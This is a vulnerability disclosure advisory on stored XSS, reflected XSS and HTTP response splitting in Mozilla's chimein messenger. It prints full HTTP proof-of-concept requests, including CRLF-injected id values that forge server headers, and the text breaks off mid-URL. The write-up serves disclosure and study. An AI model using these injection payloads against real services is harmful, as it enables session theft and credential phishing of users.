###################################################################### # Exploit Title: Mozilla.org sub-domain Stored-XSS - Reflected-XSS - HTTP Response Splitting # Date: 03/04/2017 # Author: Yann CAM @ Synetis - ASafety # Vendor or Software Link: www.mozilla.org # Version: / # Category: Stored Cross Site Scripting / Reflected Cross Site Scripting / HTTP Response Splitting # Google dork: # Tested on: mozilla.org chimein sub-domain ###################################################################### Mozilla description : ====================================================================== Mozilla is a free-software community, created in 1998 by members of Netscape. The Mozilla community uses, develops, spreads and supports Mozilla products, thereby promoting exclusively free software and open standards, with only minor exceptions. The community is supported institutionally by the Mozilla Foundation and its tax-paying subsidiary, the Mozilla Corporation. Mozilla produces many products such as the Firefox web browser, Thunderbird e-mail client, Firefox Mobile web browser, Firefox OS mobile operating system, Bugzilla bug tracking system and other projects. Vulnerabilities description : ====================================================================== The Chimein.mozilla.org sub-domain (access via HTTPS) provides a secure web messenger application. This application needs autrhentication. Each user is authenticated with a "login / password". Then, to sent message to other user, a public/private key is used to encrypt and sign message. The private key is protected via a passphrase. This secure web messenger application contains several vulnerabilities : - A stored XSS is available in the body of each message sent encrypted to other users. Through this vulnerability, an attacker could tamper with page rendering, redirect victims to fake Mozilla portals, or capture Mozilla's users credentials such key/password. - A reflected XSS is available in the sign up process (login). Through this vulnerability, an attacker could tamper with page rendering, redirect victims to fake Mozilla portals, or capture Mozilla's users credentials such key/password. - A HTTP Response Splitting is available in the "/message/get" endpoint. This vulnerability can be used to create Reflected XSS. Proof of Concept ndeg1 : Stored Cross-Site Scripting ====================================================================== The chimein.mozilla.org domain (https://chimein.mozilla.org/) provides a very simple "sign up / sign in / send message" process with asymetric encryption (public key, private key, password and passphrase) to add a strong security for message exchange. A simple user can create an account, log in with this account, and send encrypted message (with passphrase) to any other user registered. There are some XSS vulnerabilities. The most critical is a Stored-XSS in the body of any message. A user will be able to create an account as describe here : https://www.asafety.fr/data/20161021-Chimein.mozilla.org_SXSS_001.png Login = ycam, password = ycam, passphrase = ycam Then, once logged in, the user can sent an arbitrary message to any other user (in the example, the message is sent to the user himself for the Proof of Concept) : https://www.asafety.fr/data/20161021-Chimein.mozilla.org_SXSS_002.png The Stored-XSS payload can be injected in the "body" of the message. The user selects a specific passphrase, so the payload is encrypted. Once sent, the message is visible for the receiver logged. When this victim-user clic on the message, he has to enter the passphrase used at encryption time. https://www.asafety.fr/data/20161021-Chimein.mozilla.org_SXSS_003.png When the passphrase is indicated, the body of the message is decrypted and the Stored-XSS is triggered (PoC : alert(document.domain)). https://www.asafety.fr/data/20161021-Chimein.mozilla.org_SXSS_004.png Stored-XSS are very critical vulnerabilities and can be used by an attacker to steal private information such as session cookie or credential. Through XSS, an attacker can tamper with page rendering, take the control of the full browser and can use browser's exploits to gain privilege on local system (especially with dedicated framework for XSS flaw like BeEF : http://beefproject.com/). This Stored-XSS was tested successfully with the latest Firefox version 49.0.2, latest Chrome version 53 and the latest IE version 11. In this case, the main Stored-XSS is embeded in a personal message didacted to a victim (the victim needs to enter the passphrase to decrypt the message's body and trigger the payload). This is a serious issue because the XSS is located in a very secure chat system with asymetric encryption used. An attacker will be able to create fake page, fake prompt, fake "re-authentication" process to steal victim's password. If the attacker gains access to a victim's account, he can used all the feature of the secure chat in place of the legitimate user. PoC - HTTP request sample (with encrypted payload) : POST /message/create HTTP/1.1 Host: chimein.mozilla.org User-Agent: Mozilla/5.0 (Windows NT 10.0; WOW64; rv:49.0) Gecko/20100101 Firefox/49.0 Accept: text/html,application/xhtml+xml,application/xml;q=0.9,*/*;q=0.8 Accept-Language: fr,fr-FR;q=0.8,en-US;q=0.5,en;q=0.3 Accept-Encoding: gzip, deflate, br Referer: https://chimein.mozilla.org/ Content-Length: 1483 Content-Type: text/plain;charset=UTF-8 DNT: 1 Connection: close login=ycam&password=ycam&sender=ycam&recipient=ycam&subject=ycam&subject_signature=C2sgosxgaKPEqJJwLb5R29A8fqX9wxA30SLqcJzKLkhEDVuAIIZesho736eDtI7GbrjpFBgc9I8E%0D%0A%2FPMRAbK6IZF9O9G%2BkOmy9a%2FmSPY9L8yiFdwk8CXzW%2Fnvmirx3qelwQ87z3cgrxGe8um7Ntc603h2%0D%0AWrux3wQrv5JptqEMC1Cj%2BatQQQ%2FB6ahv9Q6K2z7wmIViR1mcZuNG9V26PwierLoNNOBDwXmChsPI%0D%0AKpy%2F0TgJhkpWj%2BPO3YIvxy015imeISUgmZyTmOaJAy7%2FOQzvw5GUAS5nTG%2FtU79kO7AlhQLTgjlL%0D%0AE3uKE2jM2ACuwtqZNeSpNTUeyGBLCxHD18vqMw%3D%3D&body=O8E%2BSCVlBZiL8xsg0yEg%2BK5%2BjdHKkuQA89z8FpLDekOT3CUa43B%2FQw%2BBxyCTgccngdRp7en7Zi%2BM%0D%0AwMgDouqt8f1NGa8hxk4xP0lxN0vsR8dz1DyY2etgtGtSY8ehWDoK&body_signature=kFLh%2BgNR1Ow2zuxqRebnYmiB%2FN2GEYWSFdLdK4dfdM2N5pKJw5eXsfu1YyKkznYEHU1c1z%2BYF13e%0D%0AzyWBWtwmSPff%2B6JFWIHGqYI2RR%2BqszbAduHwHSniFPkz0gKntc%2FxOe8GFX62z78pAPJfZ4tLyg8p%0D%0ALobVsLDjaipcRsy4tC0LWz56zjCWbACKPP9Gwi0VGng2Ny3KYoTSt%2B6t7GkCWf799ztY8R0WYJ8q%0D%0AskQAYD5LuHpdadi8%2B8RDdgYOaepyYPGfjuhJXXsqec9rivk84mkZSa8cAtXgrFF4bnj%2BF9z8KFgc%0D%0AvhiVAG71i65AVRbJ6pPR2CKjnnOhSkBjldNIuQ%3D%3D&session_key=a3EPAkTnptCVn9FSgmfTkpgzgjQgOGuYLFG%2BMmtmZjcwAPJjXePxH8%2F1XWWolhPn1fRmf4j9ybmo%0D%0AlXYOg4Fj1ss8k2HRcugxridBTkZ53dd0Af0qEHeSsiA1Rsm0d2G76k6qsWzgD55WBc6nuEXiOrzM%0D%0ATxVPIcT%2FvLbjTA0hrnzmm%2Ftiyq31YPVOYq3Di95urw38DFJIRPKiP%2FcJ0GoWkUrcB6OK8lCfvx0K%0D%0AWsS%2BPpAB%2Fc1xBUoG0TmFKZRkCXx8toykvz7cqC6hwZHbWRj4A5cLbnIrYdIXZ%2B2AkjhwcNzqWHQb%0D%0AHHm1wN6fkalHKXW7%2BwM2ctioB1JaE3gYE7WmGA%3D%3D&session_key_iv=zOtfAHFpmaW%2Bhm2xcJhPxw%3D%3D& Proof of Concept ndeg2 : Reflected Cross-Site Scripting ====================================================================== There is another Reflected XSS vulnerability in the "login" text input during registration (the user login needs to be new at each sign up) : Payload injection : https://www.asafety.fr/data/20161021-Chimein.mozilla.org_RXSS_001.png Reflected XSS fired : https://www.asafety.fr/data/20161021-Chimein.mozilla.org_RXSS_002.png Proof of Concept ndeg3 : HTTP Response Splitting leverage to Reflected XSS ====================================================================== Exchange requests are made through API call, for example when a user POST a message, it's the "/message/create" entry point which is called. To list message "/message/list", and to consult a specific message the following request is made (as example, the message ID : 57 owned by the user ycam with password ycam used as Proof of Concept) : POST /message/get HTTP/1.1 Host: chimein.mozilla.org User-Agent: Mozilla/5.0 (Windows NT 10.0; WOW64; rv:49.0) Gecko/20100101 Firefox/49.0 Accept: text/html,application/xhtml+xml,application/xml;q=0.9,*/*;q=0.8 Accept-Language: fr,fr-FR;q=0.8,en-US;q=0.5,en;q=0.3 Accept-Encoding: gzip, deflate, br DNT: 1 Connection: close Upgrade-Insecure-Requests: 1 Content-Type: application/x-www-form-urlencoded Content-Length: 30 login=ycam&password=ycam&id=57 The resulting data are like (JSON) : HTTP/1.1 200 OK Content-Type: application/json Content-Length: 1525 Date: Fri, 21 Oct 2016 00:05:14 GMT Connection: close {"id":57,"sender":"ycam","recipient":"ycam","subject":"ycam","subject_signature":"C2sgosxgaKPEqJJwLb5R29A8fqX9wxA30SLqcJzKLkhEDVuAIIZesho736eDtI7GbrjpFBgc9I8E\r\n/PMRAbK6IZF9O9G+kOmy9a/mSPY9L8yiFdwk8CXzW/nvmirx3qelwQ87z3cgrxGe8um7Ntc603h2\r\nWrux3wQrv5JptqEMC1Cj+atQQQ/B6ahv9Q6K2z7wmIViR1mcZuNG9V26PwierLoNNOBDwXmChsPI\r\nKpy/0TgJhkpWj+PO3YIvxy015imeISUgmZyTmOaJAy7/OQzvw5GUAS5nTG/tU79kO7AlhQLTgjlL\r\nE3uKE2jM2ACuwtqZNeSpNTUeyGBLCxHD18vqMw==","body":"O8E+SCVlBZiL8xsg0yEg+K5+jdHKkuQA89z8FpLDekOT3CUa43B/Qw+BxyCTgccngdRp7en7Zi+M\r\nwMgDouqt8f1NGa8hxk4xP0lxN0vsR8dz1DyY2etgtGtSY8ehWDoK","body_signature":"kFLh+gNR1Ow2zuxqRebnYmiB/N2GEYWSFdLdK4dfdM2N5pKJw5eXsfu1YyKkznYEHU1c1z+YF13e\r\nzyWBWtwmSPff+6JFWIHGqYI2RR+qszbAduHwHSniFPkz0gKntc/xOe8GFX62z78pAPJfZ4tLyg8p\r\nLobVsLDjaipcRsy4tC0LWz56zjCWbACKPP9Gwi0VGng2Ny3KYoTSt+6t7GkCWf799ztY8R0WYJ8q\r\nskQAYD5LuHpdadi8+8RDdgYOaepyYPGfjuhJXXsqec9rivk84mkZSa8cAtXgrFF4bnj+F9z8KFgc\r\nvhiVAG71i65AVRbJ6pPR2CKjnnOhSkBjldNIuQ==","session_key":"a3EPAkTnptCVn9FSgmfTkpgzgjQgOGuYLFG+MmtmZjcwAPJjXePxH8/1XWWolhPn1fRmf4j9ybmo\r\nlXYOg4Fj1ss8k2HRcugxridBTkZ53dd0Af0qEHeSsiA1Rsm0d2G76k6qsWzgD55WBc6nuEXiOrzM\r\nTxVPIcT/vLbjTA0hrnzmm/tiyq31YPVOYq3Di95urw38DFJIRPKiP/cJ0GoWkUrcB6OK8lCfvx0K\r\nWsS+PpAB/c1xBUoG0TmFKZRkCXx8toykvz7cqC6hwZHbWRj4A5cLbnIrYdIXZ+2AkjhwcNzqWHQb\r\nHHm1wN6fkalHKXW7+wM2ctioB1JaE3gYE7WmGA==","session_key_iv":"zOtfAHFpmaW+hm2xcJhPxw==","status":"read","sent_date":"2016-10-20T23:05:30.009Z","retrieved_date":"2016-10-20T23:06:45.811Z","read_date":"2016-10-20T23:06:48.066Z"} Screenshot : https://www.asafety.fr/data/20161021-Chimein.mozilla.org_HRS_001.png https://www.asafety.fr/data/20161021-Chimein.mozilla.org_HRS_002.png https://www.asafety.fr/data/20161021-Chimein.mozilla.org_HRS_003.png If a user changes the value of the "id" in POST param of the initial request, the following error is retrieved : POST /message/get HTTP/1.1 Host: chimein.mozilla.org User-Agent: Mozilla/5.0 (Windows NT 10.0; WOW64; rv:49.0) Gecko/20100101 Firefox/49.0 Accept: text/html,application/xhtml+xml,application/xml;q=0.9,*/*;q=0.8 Accept-Language: fr,fr-FR;q=0.8,en-US;q=0.5,en;q=0.3 Accept-Encoding: gzip, deflate, br DNT: 1 Connection: close Upgrade-Insecure-Requests: 1 Content-Type: application/x-www-form-urlencoded Content-Length: 31 login=ycam&password=ycam&id=xxx Error received : HTTP/1.1 500 message xxx does not exist Date: Fri, 21 Oct 2016 00:07:11 GMT Connection: close Content-Length: 0 Screenshot : https://www.asafety.fr/data/20161021-Chimein.mozilla.org_HRS_004.png There is a reflection of the "id" value in the HTTP headers returned by the server. With the sequence %0a%0d (\r\n), an attacker can forge headers and responses content himself : POST /message/get HTTP/1.1 Host: chimein.mozilla.org User-Agent: Mozilla/5.0 (Windows NT 10.0; WOW64; rv:49.0) Gecko/20100101 Firefox/49.0 Accept: text/html,application/xhtml+xml,application/xml;q=0.9,*/*;q=0.8 Accept-Language: fr,fr-FR;q=0.8,en-US;q=0.5,en;q=0.3 Accept-Encoding: gzip, deflate, br DNT: 1 Connection: close Upgrade-Insecure-Requests: 1 Content-Type: application/x-www-form-urlencoded Content-Length: 55 login=ycam&password=ycam&id=xxx%0a%0dyyy%0a%0dzzz%0a%0d Response : HTTP/1.1 500 message xxx yyy zzz does not exist Date: Fri, 21 Oct 2016 00:08:40 GMT Connection: close Content-Length: 0 Screenshot : https://www.asafety.fr/data/20161021-Chimein.mozilla.org_HRS_005.png So, with a specific payload, an attacker can forge his own response from the server with the right headers (Content-Type: text/html) and arbitrary source code. Plus, the payload can be sent directly in GET param or in POST param. In GET, the vulnerability is more easy to sent to victims : https://chimein.mozilla.org/message/get?login=ycam&password=ycam&id=x%0a%0dContent-Length: 100%0a%0dContent-Type: text/html%0a%0d%0a%0d